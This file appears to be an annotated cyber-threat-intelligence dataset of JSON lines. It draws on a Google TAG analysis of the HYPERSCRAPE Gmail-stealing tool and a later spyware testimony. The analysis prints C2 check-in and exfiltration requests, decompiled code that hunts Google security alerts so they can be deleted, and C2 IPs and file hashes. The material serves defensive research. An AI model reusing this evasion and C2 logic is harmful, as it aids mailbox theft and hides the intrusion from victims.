objectives.","entities":[{"id":50196,"label":"malware","start_offset":28,"end_offset":39},{"id":50197,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[{"id":931,"from_id":50197,"to_id":50196,"type":"uses"}],"Comments":[]} {"id":4384,"text":" HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[{"id":50198,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":4385,"text":"It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.","entities":[{"id":50199,"label":"SOFTWARE","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} {"id":4386,"text":"Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread.","entities":[],"relations":[],"Comments":[]} {"id":4387,"text":"After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google.","entities":[{"id":50200,"label":"SOFTWARE","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} {"id":4388,"text":"Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.","entities":[{"id":50201,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} {"id":4389,"text":"The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine.","entities":[{"id":50202,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":4390,"text":"We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts.","entities":[{"id":50203,"label":"malware","start_offset":10,"end_offset":21}],"relations":[],"Comments":[]} {"id":4391,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50204,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4392,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} {"id":4393,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} {"id":4394,"text":"In later versions it was obfuscated with Base64.","entities":[],"relations":[],"Comments":[]} {"id":4395,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":50205,"label":"URL","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} {"id":4396,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} {"id":4397,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} {"id":4398,"text":"The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file.","entities":[],"relations":[],"Comments":[]} {"id":4399,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} {"id":4400,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} {"id":4401,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} {"id":4402,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":13184,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} {"id":4403,"text":"Host: {C2} Accept-Encoding: gzip","entities":[],"relations":[],"Comments":[]} {"id":4404,"text":"If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.","entities":[],"relations":[],"Comments":[]} {"id":4405,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} {"id":4406,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} {"id":4407,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} {"id":4408,"text":"The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.","entities":[{"id":50206,"label":"SOFTWARE","start_offset":157,"end_offset":162}],"relations":[],"Comments":[]} {"id":4409,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[],"relations":[],"Comments":[]} {"id":4410,"text":"Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[{"id":50207,"label":"malware","start_offset":57,"end_offset":68}],"relations":[],"Comments":[]} {"id":4411,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} {"id":4412,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[{"id":50208,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4413,"text":"It does the following for each email found: The emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the subject.","entities":[],"relations":[],"Comments":[]} {"id":4414,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} {"id":4415,"text":"When finished, a HTTP POST request is made to the C2 to relay the status and system information.","entities":[],"relations":[],"Comments":[]} {"id":4416,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} {"id":4417,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":13209,"label":"URL","start_offset":5,"end_offset":44},{"id":13211,"label":"TIME","start_offset":206,"end_offset":217}],"relations":[],"Comments":[]} {"id":4418,"text":"The program will delete any security emails from Google generated by the attacker’s activity.","entities":[{"id":50209,"label":"SOFTWARE","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} {"id":4419,"text":"private bool IsThereAnyEMail() { List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\") where x.TextContent.StartsWith (\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") || x.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\") || x.TextContent.StartsWith(\"Critical security alert\") ||","entities":[],"relations":[],"Comments":[]} {"id":4420,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} {"id":4421,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} {"id":4422,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} {"id":4423,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} {"id":4424,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} {"id":4425,"text":"; bool flag = list.Count == 0; return !flag; }","entities":[],"relations":[],"Comments":[]} {"id":4426,"text":"Data from Google Takeout is also available upon request, but the option was only found in early builds.","entities":[{"id":50210,"label":"SOFTWARE","start_offset":10,"end_offset":24}],"relations":[],"Comments":[]} {"id":4427,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} {"id":4428,"text":"When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout.","entities":[],"relations":[],"Comments":[]} {"id":4429,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} {"id":4430,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[],"relations":[],"Comments":[]} {"id":4431,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} {"id":4432,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} {"id":4433,"text":"{ try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() == null) { Thread.Sleep(1000); }","entities":[],"relations":[],"Comments":[]} {"id":4434,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} {"id":4435,"text":"catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } }","entities":[],"relations":[],"Comments":[]} {"id":4436,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} {"id":4437,"text":"TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted.","entities":[{"id":50211,"label":"identity","start_offset":0,"end_offset":3},{"id":50212,"label":"threat-actor","start_offset":75,"end_offset":90}],"relations":[],"Comments":[]} {"id":4438,"text":"It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement.","entities":[{"id":50213,"label":"identity","start_offset":41,"end_offset":71}],"relations":[],"Comments":[]} {"id":4439,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} {"id":4440,"text":"We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[],"relations":[],"Comments":[]} {"id":4441,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} {"id":4442,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":50214,"label":"malware","start_offset":33,"end_offset":44},{"id":13275,"label":"IPV4","start_offset":4,"end_offset":18},{"id":13276,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} {"id":4443,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":50215,"label":"FILEPATH","start_offset":608,"end_offset":715},{"id":50216,"label":"FILEPATH","start_offset":716,"end_offset":815},{"id":50217,"label":"identity","start_offset":520,"end_offset":529},{"id":13277,"label":"SHA2","start_offset":0,"end_offset":64},{"id":13281,"label":"SHA2","start_offset":260,"end_offset":324},{"id":13282,"label":"SHA2","start_offset":325,"end_offset":389},{"id":13283,"label":"SHA2","start_offset":390,"end_offset":454},{"id":13284,"label":"SHA2","start_offset":455,"end_offset":519},{"id":13278,"label":"SHA2","start_offset":65,"end_offset":129},{"id":13279,"label":"SHA2","start_offset":130,"end_offset":194},{"id":13280,"label":"SHA2","start_offset":195,"end_offset":259},{"id":13286,"label":"SHA2","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} {"id":4444,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[{"id":50218,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":4445,"text":"It was last updated on July 29, 2022.","entities":[{"id":50219,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} {"id":4446,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google’s efforts to protect users from commercial spyware.","entities":[{"id":50220,"label":"identity","start_offset":46,"end_offset":79},{"id":50223,"label":"identity","start_offset":173,"end_offset":188},{"id":50221,"label":"identity","start_offset":83,"end_offset":153},{"id":50222,"label":"TIME","start_offset":157,"end_offset":170},{"id":50224,"label":"identity","start_offset":324,"end_offset":331}],"relations":[],"Comments":[]} {"id":4447,"text":"We appreciate the Committee’s efforts to raise awareness about the commercial spyware industry that is thriving and growing, creating risks to Americans and Internet users across the globe.","entities":[],"relations":[],"Comments":[]} {"id":4448,"text":" Google has been tracking the activities of commercial spyware vendors for years, and we have been taking critical steps to protect our users.","entities":[{"id":50225,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4449,"text":"We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources.","entities":[],"relations":[],"Comments":[]} {"id":4450,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50226,"label":"identity","start_offset":4,"end_offset":25},{"id":50227,"label":"identity","start_offset":30,"end_offset":33}],"relations":[{"id":932,"from_id":50227,"to_id":50226,"type":"duplicate-of"}],"Comments":[]} {"id":4451,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50228,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4452,"text":"For example, TAG has been closely tracking and disrupting campaigns targeting individuals and organizations in Ukraine, and frequently publishes reports on Russian threat actors.","entities":[{"id":50229,"label":"identity","start_offset":13,"end_offset":16},{"id":50230,"label":"location","start_offset":111,"end_offset":118},{"id":50231,"label":"location","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} {"id":4453,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[],"relations":[],"Comments":[]} {"id":4454,"text":"We also publicly release information about the operations we disrupt, which is available to our government partners and the general public.","entities":[],"relations":[],"Comments":[]} {"id":4455,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.","entities":[{"id":50232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4456,"text":"And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4457,"text":"We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.","entities":[{"id":50233,"label":"identity","start_offset":61,"end_offset":67},{"id":50234,"label":"identity","start_offset":79,"end_offset":91},{"id":50235,"label":"identity","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} {"id":4458,"text":" Google has a long track record combating commercial surveillance tools targeting our users.","entities":[{"id":50236,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4459,"text":"In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.","entities":[{"id":50241,"label":"malware","start_offset":108,"end_offset":115},{"id":50237,"label":"TIME","start_offset":3,"end_offset":7},{"id":50240,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50238,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50239,"label":"identity","start_offset":37,"end_offset":43}],"relations":[{"id":933,"from_id":50241,"to_id":50240,"type":"authored-by"}],"Comments":[]} {"id":4460,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50243,"label":"malware","start_offset":102,"end_offset":109},{"id":50244,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50245,"label":"identity","start_offset":17,"end_offset":29}],"relations":[{"id":934,"from_id":50243,"to_id":50244,"type":"targets"}],"Comments":[]} {"id":4461,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} {"id":4462,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50246,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":4463,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[{"id":50247,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":4464,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50250,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50251,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50248,"label":"TIME","start_offset":3,"end_offset":7},{"id":50249,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50252,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} {"id":4465,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50253,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4466,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50254,"label":"TIME","start_offset":3,"end_offset":16},{"id":50255,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50256,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} {"id":4467,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50257,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":4468,"text":"Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.","entities":[{"id":50258,"label":"attack-pattern","start_offset":74,"end_offset":92}],"relations":[],"Comments":[]} {"id":4469,"text":"Based on our research and findings, we assessed this to be one of the most technically sophisticated exploits we had ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.","entities":[{"id":50259,"label":"threat-actor","start_offset":172,"end_offset":175}],"relations":[],"Comments":[]} {"id":4470,"text":"Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users.","entities":[{"id":50260,"label":"threat-actor","start_offset":63,"end_offset":72}],"relations":[],"Comments":[]} {"id":4471,"text":"For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.","entities":[{"id":50266,"label":"campaign","start_offset":28,"end_offset":37},{"id":50261,"label":"identity","start_offset":13,"end_offset":16},{"id":50265,"label":"SOFTWARE","start_offset":117,"end_offset":134},{"id":50262,"label":"location","start_offset":48,"end_offset":56},{"id":50263,"label":"vulnerability","start_offset":78,"end_offset":102},{"id":50264,"label":"SOFTWARE","start_offset":106,"end_offset":112}],"relations":[{"id":935,"from_id":50266,"to_id":50262,"type":"targets"},{"id":936,"from_id":50266,"to_id":50263,"type":"exploits"},{"id":937,"from_id":50264,"to_id":50263,"type":"has"},{"id":938,"from_id":50265,"to_id":50263,"type":"has"}],"Comments":[]} {"id":4472,"text":"We assessed that a surveillance vendor packaged and sold these technologies.","entities":[],"relations":[],"Comments":[]} {"id":4473,"text":"Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.","entities":[{"id":50267,"label":"identity","start_offset":13,"end_offset":23},{"id":50268,"label":"threat-actor","start_offset":48,"end_offset":55},{"id":50269,"label":"location","start_offset":60,"end_offset":67}],"relations":[{"id":939,"from_id":50268,"to_id":50269,"type":"located-at"}],"Comments":[]} {"id":4474,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50270,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} {"id":4475,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50274,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50271,"label":"vulnerability","start_offset":42,"end_offset":66},{"id":50272,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50273,"label":"SOFTWARE","start_offset":88,"end_offset":95}],"relations":[{"id":940,"from_id":50272,"to_id":50271,"type":"has"},{"id":941,"from_id":50273,"to_id":50271,"type":"has"}],"Comments":[]} {"id":4476,"text":"We assess with high confidence that commercial surveillance company Cytrox packaged these vulnerabilities, and sold the hacking software to at least eight governments.","entities":[{"id":50275,"label":"threat-actor","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} {"id":4477,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} {"id":4478,"text":"Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.","entities":[{"id":50276,"label":"identity","start_offset":62,"end_offset":72},{"id":50277,"label":"identity","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} {"id":4479,"text":"TAG also recently released information on a segment of attackers we call “hack-for-hire” that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50279,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50278,"label":"identity","start_offset":0,"end_offset":3},{"id":50280,"label":"attack-pattern","start_offset":74,"end_offset":87}],"relations":[],"Comments":[]} {"id":4480,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50281,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4481,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4482,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50286,"label":"location","start_offset":89,"end_offset":109},{"id":50282,"label":"TIME","start_offset":3,"end_offset":7},{"id":50283,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50285,"label":"location","start_offset":73,"end_offset":79},{"id":50284,"label":"location","start_offset":66,"end_offset":71}],"relations":[],"Comments":[]} {"id":4483,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50287,"label":"attack-pattern","start_offset":45,"end_offset":58},{"id":50288,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} {"id":4484,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50289,"label":"location","start_offset":71,"end_offset":76},{"id":50290,"label":"location","start_offset":78,"end_offset":84},{"id":50291,"label":"location","start_offset":90,"end_offset":101},{"id":50292,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} {"id":4485,"text":" Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.","entities":[],"relations":[],"Comments":[]} {"id":4486,"text":"These vendors operate with deep technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} {"id":4487,"text":"We believe its use is growing, fueled by demand from governments.","entities":[],"relations":[],"Comments":[]} {"id":4488,"text":"Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors.","entities":[{"id":50293,"label":"identity","start_offset":47,"end_offset":68},{"id":50294,"label":"vulnerability","start_offset":18,"end_offset":42}],"relations":[],"Comments":[]} {"id":4489,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.","entities":[{"id":50295,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4490,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} {"id":4493,"text":"These vendors are enabling the proliferation of dangerous hacking tools, arming nation state actors that would not otherwise be able to develop these capabilities in-house.","entities":[],"relations":[],"Comments":[]} {"id":4494,"text":"While use of surveillance technologies may be legal under national or international laws, they are found to be used by some state actors for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers, and opposition party politicians.","entities":[],"relations":[],"Comments":[]} {"id":4495,"text":"We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.","entities":[],"relations":[],"Comments":[]} {"id":4496,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50298,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} {"id":4497,"text":"The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.","entities":[{"id":50299,"label":"campaign","start_offset":23,"end_offset":31},{"id":50300,"label":"location","start_offset":92,"end_offset":103}],"relations":[{"id":942,"from_id":50299,"to_id":50300,"type":"attributed-to"}],"Comments":[]} {"id":4498,"text":"In addition to these concerns, there are other reasons why this industry presents a risk more broadly across the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4499,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[{"id":50301,"label":"attack-pattern","start_offset":158,"end_offset":182}],"relations":[],"Comments":[]} {"id":4500,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} {"id":4501,"text":"The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.","entities":[],"relations":[],"Comments":[]} {"id":4502,"text":"This is why when Google discovers these activities, we not only take steps to protect users, but also disclose that information publicly to raise awareness and help the entire ecosystem, in line with our historical commitment to openness and democratic values.","entities":[{"id":50302,"label":"identity","start_offset":17,"end_offset":23}],"relations":[],"Comments":[]} {"id":4503,"text":"Across all Google products, we incorporate industry-leading security features and protections to keep our users safe.","entities":[{"id":50303,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":4504,"text":"On Search, Google’s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50304,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":4505,"text":"Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.","entities":[{"id":50305,"label":"SOFTWARE","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} {"id":4506,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":50306,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":4507,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50307,"label":"identity","start_offset":3,"end_offset":8},{"id":50308,"label":"identity","start_offset":31,"end_offset":36},{"id":50309,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50311,"label":"attack-pattern","start_offset":93,"end_offset":97},{"id":50310,"label":"attack-pattern","start_offset":79,"end_offset":87}],"relations":[],"Comments":[]} {"id":4508,"text":"Spoofers may send forged messages using an organization’s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} {"id":4509,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[],"relations":[],"Comments":[]} {"id":4510,"text":"And we offer other advanced phishing and malware protection to administrators to better protect their users.","entities":[],"relations":[],"Comments":[]} {"id":4511,"text":"By default, Gmail displays warnings and moves untrustworthy emails to the user’s spam folder.","entities":[{"id":50312,"label":"SOFTWARE","start_offset":12,"end_offset":17}],"relations":[],"Comments":[]} {"id":4512,"text":"However administrators can also use advanced security settings to enhance their users’ protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} {"id":4513,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50313,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4514,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50314,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4515,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} {"id":4516,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":50315,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} {"id":4517,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50316,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":4518,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} {"id":4519,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users’ hands.","entities":[{"id":50317,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":4520,"text":"For example, Google Play Protect, our built-in malware protection for Android, continuously scans devices for potentially harmful 